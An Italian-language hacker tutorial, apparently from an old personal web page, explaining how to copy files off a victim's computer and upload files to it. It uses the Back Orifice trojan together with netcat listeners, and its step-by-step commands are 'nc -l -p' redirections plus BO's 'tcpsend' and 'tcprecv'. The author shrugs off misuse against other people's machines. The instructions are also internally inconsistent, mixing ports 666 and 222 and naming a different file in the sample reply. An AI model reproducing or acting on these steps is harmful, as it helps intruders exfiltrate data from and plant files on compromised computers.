-------------------------------------------------------------------
SU E GIU' NELL' ORIFIZIO POSTERIORE by sHaDy
Ovvero come diavolo si effettua download e upload con Back Orifice
sfruttando il NetCat come appoggio (non è un porno).
-------------------------------------------------------------------
Benvenuti nel mini howto che vi illustrerà in modo confuso e stupido
come si fa a fare ildownload da un pc(non il vostro) utilizzando BO
(Back Orifice, famoso trojan) e il sempre verde NetCat. Prima di
cominciare due piccole note:
Disclaimer '01' (per gli ingenui): l'autore di questo doc non è in
alcun modo responsabile di eventuali usi maliziosi o illegali dei
contenuti del documento stesso.
Disclaimer '02' (per tutti coloro che pensano che fare un tutorial
che parla di un trojan sia da lamer): questa non è una guida lamer.
Mi è sembrato interessante proporre un esempio pratico di interazio-
ne tra il NetCat e un altro programma e me ne sbatto i maroni se un
ragazzino idiota fa l'upload di un virus sul pc della nonna come me
ne sbatto se due pirloni mi vengono a dire che sono solo un lamer
che si diverte a usare i trojan. Ok, ok, ora cominciamo con l'arti-
colo vero e proprio. Let's go!
Ultima nota: non fate conto su di me se non sapete cos'è il NetCat.
Naturalmente dovete avere il netcat. Nel tutorial supponiamo che si
trovi in C:\ e naturalmente dovete avere Back Orifice entrambi
facilmente rintracciabili su internet.
------------------------------------------------------------------
DOWNLOAD
------------------------------------------------------------------
Per prima cosa aprite il prompt dei comandi del dos e digitate il
comando che segue
cd C:\
nc -l -p 222 > dos.sys
Dove: nc serve a chiamare il programma netcat
-l (listen) lo mette in ascolto
-p 666 imposta la porta su cui dovrà ascoltare (666)
> dos.sys dice che il file dos.sys (file situato sul pc vit-
tima che useremo come esempio) sta per arrivare proprio da
quella porta.
(La porta 666 è solo di esempio potete anche cambiarla).Quel cd C:\
serve solo ad entrare nella directory dove risiede il netcat (C:\)
Così il netcat è pronto a ricevere il file.A questo punto l'azione
si sposta sul pc vittima. Qui entra in gioco il BO in quanto voi
dovrete esservi già connessi al pc della vittima con il comando
host (dove ip è l'ip della vittima). Collegati al server dell
host il prossimo passo sarà quello di digitare:
tcpsend c:\dos.sys 123.0.0.9:222
Dove 123.0.0.9 va sostituito con l'ip della vittima. La risposta
del server sarà la seguente (sempre se è andato tutto bene).
sending c:\windows\win.ini vostro ip:port
Ok, ok aspettate a fare l'aeroplanino nella stanza e festeggiare
con la sangria che tenete sotto al letto per le occasioni speciali
L'articolo non è ancora finito (suona come una velata minaccia...)
Innanzitutto preciso che il file verrà salvato nella dir dove il
netcat risiede ora è arrivato il moento di parlare di upload :)
------------------------------------------------------------------
UPLOAD
------------------------------------------------------------------
Una volta capito il download l'upload diventa molto semplice. Come
al solito si comincia con l'aprire il dos ma ora ciò che scrivere-
mo sarù un po' variato:
nc -l -p 222 < doc.txt
Come vedete varia il segno "<" che prima era inverso. Naturalmente
doc.txt è d'esempio e la porta pure. Nel nostro esempio ipotizziamo
che doc.txt si trovi nella directory c:\documenti Procederemo come
per il download ma al posto di tcpsend utilizzeremo il comando di
BO tcprecv come segue:
tcprecv c:\documenti\doc.txt 123.0.0.9:222
Ringrazio l'autore del doc in inglese da cui ho imparato e saluto
tutti visto che non c'è più niente da dire. Grazie per avere let-
to ste cazzate. Bye bye.
----------------------------------
robcasanovi virgilio it
----------------------------------
(
geocities.com/it)